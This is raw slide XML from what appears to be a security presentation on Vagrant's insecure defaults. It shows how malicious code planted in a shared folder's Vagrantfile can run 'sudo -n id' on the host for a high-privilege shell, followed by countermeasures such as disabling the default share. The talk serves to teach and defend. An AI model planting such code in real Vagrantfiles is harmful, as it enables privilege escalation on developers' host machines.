              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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55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190436"/>
            <a:ext cx="3484245" cy="2764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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-160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SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215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sz="1200" spc="-155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FOLDERS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50165">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(High Privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Host)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</a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="60" baseline="6944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Aroania"/>
                <a:cs typeface="Aroania"/>
              </a:rPr>
              <a:t>▶ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Planting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Into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Vagrantfile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795"/>
              </a:spcBef>
            </a:pP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# Getting High Privilege Shell on Host</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="50800" marR="567690">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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# &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Local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Host User Needs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>To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Be Within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Sudoers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List  # &gt; Sudo Session Needs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Active</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="508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Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>system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(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”sudo -n id &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>root-id 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2&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>/dev/null”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)</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="890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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reloading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Vagrantfile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795"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="327660" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="890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28295" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remount </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant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-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Share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795"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>mount </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>-t vboxsf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>/vagrant</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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56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789" y="190436"/>
            <a:ext cx="2821940" cy="1685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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-160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SHARED</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-220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sz="1200" spc="-155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FOLDERS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62865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-140" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Counter-Measures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Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="340360" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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40995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Disable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vagrant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130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Share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20074"/>
              </a:buClr>
              <a:buFont typeface="Aroania"/>
              <a:buChar char="▶"/>
            </a:pPr>
            <a:endParaRPr sz="1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900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>conig.vm.synced_folder </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>’.’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>’/vagrant’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>disabled:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="20" dirty="0"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007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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850">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="340360" indent="-148590">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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40995" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Allow Local </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use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25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sudo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57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17" y="190436"/>
            <a:ext cx="170116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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-275" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>DEFAULTS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465" y="906424"/>
            <a:ext cx="974090" cy="187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3040">
              <a:lnSpc>
                <a:spcPct val="137800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Shared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Folders </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Defaults </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-105" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Exploitation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spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6D6D6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Recommendations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7198" y="968629"/>
            <a:ext cx="0" cy="1832610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1832610">
                <a:moveTo>
                  <a:pt x="0" y="183222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410" y="1605457"/>
            <a:ext cx="8102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5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DEFAULTS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58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417" y="190436"/>
            <a:ext cx="170116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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-275" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-150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DEFAULTS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9886" y="1824710"/>
            <a:ext cx="244078" cy="1051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91273" y="966281"/>
            <a:ext cx="3225800" cy="983615"/>
            <a:chOff x="691273" y="966281"/>
            <a:chExt cx="3225800" cy="983615"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="691273" y="1165305"/>
              <a:ext cx="541257" cy="54125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66238" y="1834261"/>
              <a:ext cx="300405" cy="1056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92882" y="1830488"/>
              <a:ext cx="12700" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12700" h="107950">
                  <a:moveTo>
                    <a:pt x="12700" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12700" y="107404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78786" y="1185167"/>
              <a:ext cx="541244" cy="54125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7568" y="1655991"/>
              <a:ext cx="716724" cy="2918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24266" y="1830488"/>
              <a:ext cx="439216" cy="11885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85023" y="1177047"/>
              <a:ext cx="541257" cy="5412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5117" y="966281"/>
              <a:ext cx="716745" cy="2918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75660" y="1186474"/>
              <a:ext cx="541257" cy="54124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25763" y="975714"/>
              <a:ext cx="716749" cy="29183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422247" y="2207461"/>
            <a:ext cx="833755" cy="137160"/>
            <a:chOff x="1422247" y="2207461"/>
            <a:chExt cx="833755" cy="137160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1422247" y="2211793"/>
              <a:ext cx="158292" cy="10510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01241" y="2235719"/>
              <a:ext cx="69126" cy="10860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96046" y="2235719"/>
              <a:ext cx="119189" cy="8118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41004" y="2207461"/>
              <a:ext cx="208178" cy="10741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75878" y="2207462"/>
              <a:ext cx="12700" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12700" h="107950">
                  <a:moveTo>
                    <a:pt x="12700" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12700" y="107404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09558" y="2235719"/>
              <a:ext cx="145884" cy="8118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423411" y="1844243"/>
            <a:ext cx="422275" cy="103505"/>
            <a:chOff x="3423411" y="1844243"/>
            <a:chExt cx="422275" cy="103505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3423411" y="1844243"/>
              <a:ext cx="203669" cy="10308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54882" y="1844243"/>
              <a:ext cx="86601" cy="1030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63670" y="1844243"/>
              <a:ext cx="81813" cy="10308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761245" y="2059127"/>
            <a:ext cx="2192655" cy="79375"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2192655" h="79375">
                <a:moveTo>
                  <a:pt x="2192190" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2177877" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2177877" y="16332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2176404" y="22415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2173483" y="25222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2170612" y="28092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2164440" y="29527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1116703" y="29527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1109096" y="31013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099609" y="37020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1096421" y="42227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1094757" y="49631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092941" y="42227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089677" y="37020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084927" y="34036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1080190" y="31013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1072621" y="29502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27796" y="31178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21579" y="29730"/>
                </a:lnTo>
